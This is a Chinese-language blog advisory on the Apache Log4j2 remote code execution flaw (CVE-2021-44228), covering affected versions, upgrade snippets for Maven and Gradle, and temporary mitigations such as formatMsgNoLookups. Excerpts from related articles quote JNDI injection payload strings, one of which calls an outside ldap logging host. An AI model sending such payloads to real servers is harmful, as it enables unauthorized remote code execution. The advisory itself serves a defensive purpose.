Apache Log4j2 RCE 命令执行漏洞预警及修复方案

最新推荐文章于 2023-07-27 11:03:59 发布
最新推荐文章于 2023-07-27 11:03:59 发布
阅读量435 收藏
点赞数
文章标签: apache java 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ichunqiu2018/article/details/121952385
版权
Apache Log4j2存在远程代码执行漏洞,影响2.0到2.15.0-rc1版本,无需授权即可触发。影响范围广泛,包括中间件、开发框架和Web应用。修复建议包括升级到2.15.0-rc2版本或设置特定系统参数。应急支持电话为400-8818-293。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞名称:Apache Log4j2远程代码执行漏洞

组件名称:Apache Log4j2

截止2021年12⽉10⽇,受影响的Apache log4j2版本:2.0≤Apache Log4j<=2.15.0-rc1

漏洞类型:远程代码执行

综合评价:

<利用难度>:容易,无需授权即可远程代码执行。

<威胁等级>:高危,能造成远程代码执行。
在这里插入图片描述

01 漏洞详情

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。

由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,⽆需进⾏特殊配置,即可触发远程代码执⾏。

02 影响范围

Apache Log4j2广泛地应用在中间件、开发框架、Web应用中。漏洞危害性高,涉及用户量较大,导致漏洞影响力巨大。

截止2021年12⽉10日,受影响的Apache log4j2版本:2.0 <= Apache log4j2 <= 2.15.0-rc1

受影响的Java框架:
在这里插入图片描述

03 修复建议

1、项目中直接使用Apache Log4j2

升级Apache Log4j2所有相关应用到最新的log4j-2.15.0-rc2版本,地址 :

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

Apache Maven 版本
修改pom.xml

<dependencies>
 <dependency>
 <groupId>org.apache.logging.log4j</groupId>
 <artifactId>log4j-api</artifactId>
 <version>2.15.0-rc2</version>
 </dependency>
 <dependency>
 <groupId>org.apache.logging.log4j</groupId>
 <artifactId>log4j-core</artifactId>
 <version>2.15.0-rc2</version>
 </dependency>
</dependencies>

Gradle 版本
修改build.gradle

dependencies {
 compile group: 'org.apache.logging.log4j', name: 'log4j-api', version: '2.15.0-rc2'
 compile group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.15.0-rc2'
}

2、框架⼆次加载 Apache Log4j2

截止目前,第三方框架中使⽤Apache Log4j2的,⽐如srping-boot、Apache Struts2等,暂未发布最新修复版本。

只能使用临时方案进行修复。

①在jvm启动参数中添加-Dlog4j2.formatMsgNoLookups=true
在这里插入图片描述
②系统环境变量中配置export LOG4J_FORMAT_MSG_NO_LOOKUPS=true
在这里插入图片描述
③项目中创建log4j2.component.properties文件,文件中增加配置log4j2.formatMsgNoLookups=true
在这里插入图片描述
④部署第三方防火墙产品。

04 应急支持

如需应急支持,请拨打客服电话。

应急响应联系电话:400-8818-293。

i春秋
关注
漏洞复现】Apache Log4j2 远程代码执行漏洞
李火火的安全圈
07-20 1106
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
深入解析著名的阿里云Log4j 漏洞
悦分享
07-24 3608
ApacheLog4j是一个基于。
Log4j漏洞不仅仅是修复,更需要构建有效预警机制
数据库技术
12-15 3953
软件的漏洞有时不可避免,根据Gartner的相关统计,到 2025 年,30% 的关键信息基础设施组织将遇到安全漏洞。日志服务SLS,可帮助快速部署一个预警机制,使得漏洞被利用时可以快速发现并及时响应。通过使用阿里云日志服务SLS,只需两步即可完成攻击检测。
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 1023
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
Log4j2_RCE漏洞复现
kukudeshuo的博客
12-20 1923
Log4j2_RCE漏洞复现 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html 复现过程 首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具 打开题目 先使用dnslog进行测试 ${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp} 填在账号输入的位置即可,密码随便填 然后点击提交 可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞 开启ldap和http服务
Apache Log4j 2 远程代码执行漏洞详解
SimpleAstronaut的博客
12-11 1万+
Apache Log4j2 远程代码执行漏洞的详细信息已被披露,而经过分析,本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。
代码审计-log4j2_rce分析
cdyunaq的博客
12-14 1087
前言 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞2021年12月9日晚,各大公众号突然发布漏洞预警 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞
log4j漏洞的执行路径
最新发布
02-25
### Log4j 漏洞执行路径分析 Log4jApache 下的一个 Java 应用常用的开源日志库,提供了强大的日志记录功能。然而,在某些版本中存在严重安全漏洞,特别是远程代码执行 (RCE) 漏洞。 当应用程序使用受影响的 ...
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4346
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
log4j漏洞log4j 1.x漏洞依赖包解决方案
你的博客
05-05 4415
那么自己的程序中确定是没有引用了,那log4j的引用必定是程序中的第三方依赖包了。如果觉得上面办法比较麻烦,也并不适合自己的场景,还有一个办法,这个办法只能躲过扫描,并未实际解决log4j漏洞问题,那就是将引入的log4j 1.2.17的包中的版本去改掉,直接修改配置中的版本号,就能躲过扫描。对于应用中我们自己写的程序全部替换为新版本。考虑了很久,某时灵光一闪,既然没有log4j的引用类,那么就在程序中创建这些类吧,这样log4j的几个自定义类仍然可以被其他包引用,而应用中又不需要引用log4j的原始包。
log4j2远程代码执行RCE漏洞复现(CVE-2021-44228)
m0_57379855的博客
03-06 690
RCE远程代码执行漏洞复现log4jLog4jLDAPJNDIJNDI注入漏洞流程Log4j影响范围和排查方法修复漏洞 Log4j Log for Java,Apach的开源日志记录组件,使用非常广泛 使用方法: 1.pom引入依赖 2.获得logger实例 3.logger.info() debug() error() warn() LDAP lightweight directory access protocol轻量级目录访问协议(目录服务)默认端口389 可以批量登录 JNDI LDAP目录服务,R
CVE-2021-44228:Apache Log4j RCE
Fly_鹏程万里
12-18 1564
文章前言 本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖 漏洞概述 Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记录⽇志信息,⼤多数情况下,开发者可能会将⽤户输⼊导致的错误信息写⼊⽇志中,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。该漏洞
分析Apache Log4j2 远程代码执行漏洞
ordersyhack
02-04 1万+
分析Apache Log4j2 远程代码执行漏洞
CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux
渗透测试研究中心
12-14 606
0x00 漏洞描述Apache Log4jApache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。Log4j-2中存在JND...
Apache Log4j2漏洞复现
weixin_51151498的博客
01-23 1593
Apache Log4j2漏洞
Log4j 漏洞修复和临时补救方法
12-14 3897
1.2 漏洞评级及影响版本 Apache Log4j 远程代码执行漏洞 严重 影响的版本范围:Apache Log4j 2.x <= 2.14.1 2.log4j2 漏洞简单演示 创建maven工程 引入jar包依赖 <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值